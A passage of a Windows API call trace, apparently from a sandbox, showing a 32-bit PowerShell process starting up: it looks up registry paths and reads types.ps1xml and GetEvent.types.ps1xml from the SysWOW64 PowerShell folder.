lpcbData=0x25e514*=0x0 | out: lpType=0x25e518*=0x1, lpData=0x0, lpcbData=0x25e514*=0x74) returned 0x0 [0140.123] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x25e4f8, lpData=0x0, lpcbData=0x25e4f4*=0x0 | out: lpType=0x25e4f8*=0x1, lpData=0x0, lpcbData=0x25e4f4*=0x74) returned 0x0 [0140.123] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x25e4f8, lpData=0x2e48d0, lpcbData=0x25e4f4*=0x74 | out: lpType=0x25e4f8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x25e4f4*=0x74) returned 0x0 [0140.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x25e078, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0140.124] GetLastError () returned 0xcb [0140.124] SetErrorMode (uMode=0x1) returned 0x1 [0140.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x25e4f8 | out: lpFileInformation=0x25e4f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0140.124] GetLastError () returned 0xcb [0140.124] SetErrorMode (uMode=0x1) returned 0x1 [0140.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e06c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0140.127] GetLastError () returned 0xcb [0140.127] SetErrorMode (uMode=0x1) returned 0x1 [0140.127] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e4ec | out: lpFileInformation=0x25e4ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0140.128] GetLastError () returned 0xcb [0140.128] SetErrorMode (uMode=0x1) returned 0x1 [0140.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e06c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0140.131] GetLastError () returned 0xcb [0140.131] SetErrorMode (uMode=0x1) returned 0x1 [0140.131] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e4ec | out: lpFileInformation=0x25e4ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0140.132] GetLastError () returned 0xcb [0140.132] SetErrorMode (uMode=0x1) returned 0x1 [0140.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0140.194] GetLastError () returned 0xcb [0140.196] GetACP () returned 0x4e4 [0140.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25defc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0140.205] GetLastError () returned 0xcb [0140.205] SetErrorMode (uMode=0x1) returned 0x1 [0140.206] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x360 [0140.206] GetLastError () returned 0x0 [0140.207] GetFileType (hFile=0x360) returned 0x1 [0140.207] SetErrorMode (uMode=0x1) returned 0x1 [0140.207] GetFileType (hFile=0x360) returned 0x1 [0140.208] ReadFile (in: hFile=0x360, lpBuffer=0x2b0cbd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b0cbd4*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.210] GetLastError () returned 0x0 [0140.211] ReadFile (in: hFile=0x360, lpBuffer=0x2b0cbd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b0cbd4*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.211] GetLastError () returned 0x0 [0140.211] ReadFile (in: hFile=0x360, lpBuffer=0x2b0cbd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b0cbd4*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.211] GetLastError () returned 0x0 [0140.212] ReadFile (in: hFile=0x360, lpBuffer=0x2b0cbd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b0cbd4*, lpNumberOfBytesRead=0x25e464*=0xcf3, lpOverlapped=0x0) returned 1 [0140.212] GetLastError () returned 0x0 [0140.212] ReadFile (in: hFile=0x360, lpBuffer=0x2b0c067, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b0c067*, lpNumberOfBytesRead=0x25e464*=0x0, lpOverlapped=0x0) returned 1 [0140.212] GetLastError () returned 0x0 [0140.212] ReadFile (in: hFile=0x360, lpBuffer=0x2b0cbd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b0cbd4*, lpNumberOfBytesRead=0x25e464*=0x0, lpOverlapped=0x0) returned 1 [0140.212] GetLastError () returned 0x0 [0140.214] CloseHandle (hObject=0x360) returned 1 [0140.214] GetLastError () returned 0x0 [0140.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0140.215] GetLastError () returned 0x0 [0140.215] SetErrorMode (uMode=0x1) returned 0x1 [0140.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2b1df48 | out: lpFileInformation=0x2b1df48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0140.215] GetLastError () returned 0x0 [0140.215] SetErrorMode (uMode=0x1) returned 0x1 [0140.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0140.268] GetLastError () returned 0x0 [0140.268] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3e8 | out: phkResult=0x25e3e8*=0x360) returned 0x0 [0140.268] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e430, lpData=0x0, lpcbData=0x25e42c*=0x0 | out: lpType=0x25e430*=0x1, lpData=0x0, lpcbData=0x25e42c*=0x56) returned 0x0 [0140.268] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e430, lpData=0x2e48d0, lpcbData=0x25e42c*=0x56 | out: lpType=0x25e430*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e42c*=0x56) returned 0x0 [0140.269] RegCloseKey (hKey=0x360) returned 0x0 [0140.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0140.269] GetLastError () returned 0x0 [0140.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0140.269] GetLastError () returned 0x0 [0140.311] GetSystemInfo (in: lpSystemInfo=0x25db68 | out: lpSystemInfo=0x25db68*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0140.313] VirtualQuery (in: lpAddress=0x25d324, lpBuffer=0x25e324, dwLength=0x1c | out: lpBuffer=0x25e324*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25defc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0140.341] GetLastError () returned 0x0 [0140.341] SetErrorMode (uMode=0x1) returned 0x1 [0140.341] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x360 [0140.341] GetLastError () returned 0x0 [0140.341] GetFileType (hFile=0x360) returned 0x1 [0140.341] SetErrorMode (uMode=0x1) returned 0x1 [0140.342] GetFileType (hFile=0x360) returned 0x1 [0140.342] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.344] GetLastError () returned 0x0 [0140.344] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.344] GetLastError () returned 0x0 [0140.345] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.345] GetLastError () returned 0x0 [0140.345] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.345] GetLastError () returned 0x0 [0140.345] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.345] GetLastError () returned 0x0 [0140.346] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.346] GetLastError () returned 0x0 [0140.346] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.346] GetLastError () returned 0x0 [0140.346] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.346] GetLastError () returned 0x0 [0140.346] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.346] GetLastError () returned 0x0 [0140.347] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.347] GetLastError () returned 0x0 [0140.347] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.347] GetLastError () returned 0x0 [0140.347] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.348] GetLastError () returned 0x0 [0140.348] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.348] GetLastError () returned 0x0 [0140.348] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.348] GetLastError () returned 0x0 [0140.348] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.348] GetLastError () returned 0x0 [0140.348] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.348] GetLastError () returned 0x0 [0140.348] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.348] GetLastError () returned 0x0 [0140.350] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.350] GetLastError () returned 0x0 [0140.350] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.350] GetLastError () returned 0x0 [0140.350] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.350] GetLastError () returned 0x0 [0140.351] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.351] GetLastError () returned 0x0 [0140.351] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.351] GetLastError () returned 0x0 [0140.351] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.351] GetLastError () returned 0x0 [0140.351] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.351] GetLastError () returned 0x0 [0140.351] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.351] GetLastError () returned 0x0 [0140.351] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.352] GetLastError () returned 0x0 [0140.352] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.352] GetLastError () returned 0x0 [0140.352] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.352] GetLastError () returned 0x0 [0140.352] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.352] GetLastError () returned 0x0 [0140.352] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.352] GetLastError () returned 0x0 [0140.352] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.352] GetLastError () returned 0x0 [0140.352] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.353] GetLastError () returned 0x0 [0140.353] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.353] GetLastError () returned 0x0 [0140.356] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.356] GetLastError () returned 0x0 [0140.356] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.357] GetLastError () returned 0x0 [0140.357] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.357] GetLastError () returned 0x0 [0140.357] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.357] GetLastError () returned 0x0 [0140.357] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.357] GetLastError () returned 0x0 [0140.357] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.357] GetLastError () returned 0x0 [0140.357] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.357] GetLastError () returned 0x0 [0140.358] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1000, lpOverlapped=0x0) returned 1 [0140.358] GetLastError () returned 0x0 [0140.358] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x1b4, lpOverlapped=0x0) returned 1 [0140.358] GetLastError () returned 0x0 [0140.358] ReadFile (in: hFile=0x360, lpBuffer=0x2b52364, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e464, lpOverlapped=0x0 | out: lpBuffer=0x2b52364*, lpNumberOfBytesRead=0x25e464*=0x0, lpOverlapped=0x0) returned 1 [0140.358] GetLastError () returned 0x0 [0140.358] CloseHandle (hObject=0x360) returned 1 [0140.358] GetLastError () returned 0x0 [0140.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0140.358] GetLastError () returned 0x0 [0140.358] SetErrorMode (uMode=0x1) returned 0x1 [0140.358] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2b72bf4 | out: lpFileInformation=0x2b72bf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0140.358] GetLastError () returned 0x0 [0140.358] SetErrorMode (uMode=0x1) returned 0x1 [0140.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0140.358] GetLastError () returned 0x0 [0140.359] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3e8 | out: phkResult=0x25e3e8*=0x360) returned 0x0 [0140.359] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e430, lpData=0x0, lpcbData=0x25e42c*=0x0 | out: lpType=0x25e430*=0x1, lpData=0x0, lpcbData=0x25e42c*=0x56) returned 0x0 [0140.359] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e430, lpData=0x2e48d0, lpcbData=0x25e42c*=0x56 | out: lpType=0x25e430*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e42c*=0x56) returned 0x0 [0140.359] 